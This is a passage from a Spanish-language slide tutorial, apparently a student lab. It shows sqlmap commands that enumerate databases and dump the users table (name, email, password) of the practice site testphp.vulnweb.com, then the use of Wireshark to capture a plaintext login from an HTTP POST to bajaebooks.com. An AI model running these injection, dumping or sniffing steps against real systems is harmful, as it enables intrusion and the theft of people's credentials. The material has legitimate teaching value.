  • 19. 2) Posteriormente ejecutamos el símbolo del sistema y nos ubicamos en la unidad donde tenemos guardado el sqlmap
  • 20. 2) Desde el símbolo del sistema ejecutamos los comandos para atacar el sitio web http://testphp.vulnweb.com.
  • 21. 2) Verificamos la vulnerabilidad de nuestro sitio agregando un apóstrofe después del signo igual (=) al final de la dirección que aparece en nuestra barra de direcciones, al hacerlo obtenemos lo siguiente:
  • 22. 2) Detectada la vulnerabilidad, procedemos a averiguar el nombre de la de datos ejecutando el siguiente comando: sqlmap.py -u (Objetivo) –dbs, obteniendo el siguiente resultado: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 – dbs
  • 23. 2) Una vez identificadas las bases de datos, procedemos a extraer información de una de ellas, para este caso vamos a trabajar sobre la base de datos denominada “acuart”, dado que en la otra base de datos están disponibles datos y estadísticas del escanneo realizado. Sin embargo con el siguiente comando podemos identificar la base de datos que utiliza el sitio: sqlmap.py -u (Objetivo) --current-db sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db
  • 24. 2) Ahora vamos a extraer el nombre de las tablas de nuestra base de datos con el siguiente comando: sqlmap.py -u (Objetivo) -D (nombre BD) --tables sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart --tables
  • 25. 2) Ahora vamos a extraer las columnas de la tabla “users” utilizando el siguiente comando: sqlmap.py -u (Objetivo) -D acuart -T (tabla) --columns sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users --columns
  • 26. 2) Ahora procedemos a extraer los datos de algunas columnas de la tabla users, ejecutando el siguiente comando: sqlmap.py -u (Objetivo) -D (Nombre de la BD) -T (Nom. de la tabla) -C (Nom. de la columna) –dump. Name: John Smith. sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users -C name --dump
  • 27. 2) email: email@email.com. sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users -C email --dump
  • 28. 2) pass: test. sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users -C pass --dump
  • 29. 2) uname: test. sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T users -C uname --dump
  • 30. 2) Hacemos una pequeña prueba con los datos extraídos:
  • 31. 2) Y corroboramos que efectivamente nuestro ataque produjo resultados exitosos.
  • 32. 3) Descargamos wireshark de su página oficial http://www.wireshark.org/download.html, para este caso decidimos descargar la versión 1.10.10. Descargamos el ejecutable y procedemos con la instalación. Finalizada la instalación ejecutamos el software.
  • 33. 3) Damos clic en Interface List, seleccionamos Conexión de red inalámbrica, clic en Start y empieza el análisis.
  • 34. 3) Análisis en proceso….
  • 35. 3) Probemos algunos filtros… 1.Con el filtro ip.addr==(ip de la maquina a escuchar), podemos escuchar una máquina específica. Obviamente ésta debe estar siendo analizada.
  • 36. 3) 2.El filtro http, nos permite mostrar el protocolo de las páginas que no tiene encriptación. Vamos a proceder a ejecutar nuestro navegador e ingresaremos a la página http://bajaebooks.com/. Sustraeremos el usuario (con su respectiva contraseña) que se ha logueado en la página.
  • 37. 3) Logueándonos en la página. Posteriormente regresamos a wireshark.
  • 38. 3) Al lado del campo para insertar el filtro está la opción expression, damos clic y nos ubicamos en http y desplegamos sus opciones.
  • 39. 3) Y seleccionamos la opción http.request.method, clic en ok y clic en Apply. Como se mencionó anteriorment, la idea es averiguar el usuario con su contraseña del sitio a donde ha ingresado.
  • 40. 3) Obteniendo lo siguiente. Damos doble clic al paquete seleccionado (azul).
  • 41. 3) Obteniendo la siguiente información:
  • 42. 3) Ingresamos al paquete cuya petición es del tipo post:
  • 43. 3) Revisamos la información que contiene…
  • 44. 3) Desplegamos la línea “Line-based text data: application/x- www-form-urlencoded” y obtenemos lo siguiente:
  • 45. 3) En efecto, tenemos la información del usuario y su contraseña.
  • 46. 3) Este es el correo de confirmación cuando nos registramos en la pagina http://bajaebooks.com/
  • 47. 3) 3.Si deseamos conocer a que servidores se conectó a través de las peticiones DNS, aplicamos el filtro dns:
  • 48. 3) En la opción “file” Wireshark nos da la opción de imprimir, guardar, etc. nuestra captura .